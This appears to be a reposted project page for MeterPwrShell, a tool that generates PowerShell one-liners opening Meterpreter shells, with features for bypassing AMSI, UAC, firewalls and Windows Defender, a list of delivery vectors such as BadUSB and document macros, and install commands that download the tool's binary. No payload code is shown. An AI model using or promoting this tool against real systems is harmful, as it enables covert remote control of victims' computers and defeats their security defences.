MeterPwrShell – Automated Tool That Generate The Perfect Powershell Payload

Powershell

Automated Tool That Generate A Powershell Oneliner That Can Create Meterpreter Shell On Metasploit,Bypass AMSI,Bypass Firewall,Bypass UAC,And Bypass Any AVs.

This tool is powered by Metasploit-Framework and amsi.fail

Notes

  • NEVER UPLOAD THE PAYLOAD THAT GENERATED BY THIS PROGRAM TO ANY ONLINE SCANNER
  • NEVER USE THIS PROGRAM FOR MALICIOUS PURPOSE
  • SPREADING THE PAYLOAD THAT GENERATED BY THIS PROGRAM IS NOT COOL
  • ANY DAMAGE GENERATED BY THIS PROGRAM IS NOT MY (As the program maker) RESPONSIBILTY!!!
  • If you have some feature recommendation,post that on Issue
  • If you have some issue with the program,try redownloading it again (trust me),cause sometimes i edit the release and fix it without telling
  • If you want to know how tf my payload bypass any AVs,you can check on this and this
  • Dont even try to fork this repository,you’ll dont get the releases!

Features (v1.5.1)

  • Bypass UAC
  • Automatic Migrate (using PrependMigrate)
  • Built-in GetSYSTEM (if u use the Bypass UAC option)
  • Disable All Firewall Profile (if u use the Bypass UAC option)
  • Fully Bypass Windows Defender Real-time Protection (if you choose shortened payload or using Bypass UAC or both)
  • Disable Windows Defender Security Features (if u use the Bypass UAC option)
  • Fully unkillable payload
  • Bypasses AMSI Successfully (if you choose shortened payload)
  • Short One-Liner (if you choose shortened payload)
  • Bypass Firewall (If you pick an unstaged payload)
  • Great CLI
  • A Lot More (Try it by yourself)

All payload features is tested on Windows 10 v20H2

Advantages Of MeterPwrShell Compared To The web_delivery Module From Metasploit Framework

  • Shorter stager (Or short one-liner in this case)
  • Various AMSI bypass technique and code
  • Dont need to setup a server for the stager
  • Support Ngrok built-in (so the victim doesnt need to be on the same local network)
  • Automatic Built-in Privesc
  • Easily Bypass Windows Defender

Thanks to

  • Every single of my Discord Friends
  • Special Thx to theia#8536 on Discord
  • @FuzzySec for that awesome Masquerade PEB script
  • @decoder-it for that amazing PPID Spoofing script
  • Me for not dying when creating this tool
  • Ed Wilson AKA Microsoft Scripting Guy for the great Powershell scripting tutorials
  • and the last one is Emeric Nasi for the research on bypassing AV dynamics

Requirements

  • Kali Linux,Ubuntu,Or Debian (If you dont use on of those,the tool will not work!!!)
  • Metasploit Framework
  • Internet Connection (Both On Victim And Attacker Computer)

Installation

apt update && apt install wget
mkdir MeterPwrShell
cd MeterPwrShell && wget https://github.com/GetRektBoy724/MeterPwrShell/releases/download/v1.5.1/meterpwrshellexec
chmod +x meterpwrshellexec

Usage

# ./meterpwrshellexec -c help
Available arguments : help, version, showbanner, showlastdebuglog, disablerootdetector, disableinternetdetector, disablealldetector
help : Show this page
version : Show MeterPwrShell's version
showbanner : Show MeterPwrShell's Banner
showlastdebuglog : Well,Its kinda self-explanatory tho
disablerootdetector : Well,Its kinda self-explanatory tho
disableinternetdetector : Well,Its kinda self-explanatory tho
disablealldetector : Disable all detector except Linux distribution detector

You also can use MeterPwrShell Without Any Flags And Arguments

Attack Vectors

  • BadUSBs
  • Malicious Shortcuts (lnk2pwn)
  • Document Macro Payload
  • MS DDE Exploit
  • Extreme Way : Type it in by yourself
  • Any exploit/vulns that let you execute command to victim
  • Idk i have run out of idea lmao

To-do List

Available features options

  • Bypass AMSI
  • Shortened Payload AKA IEX WebClient method (If you use Bypass AMSI Feature)
  • Bypass UAC (If you use Shortened Payload AKA IEX WebClient method)
Download MeterPwrShell

If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.

Discord

Original Source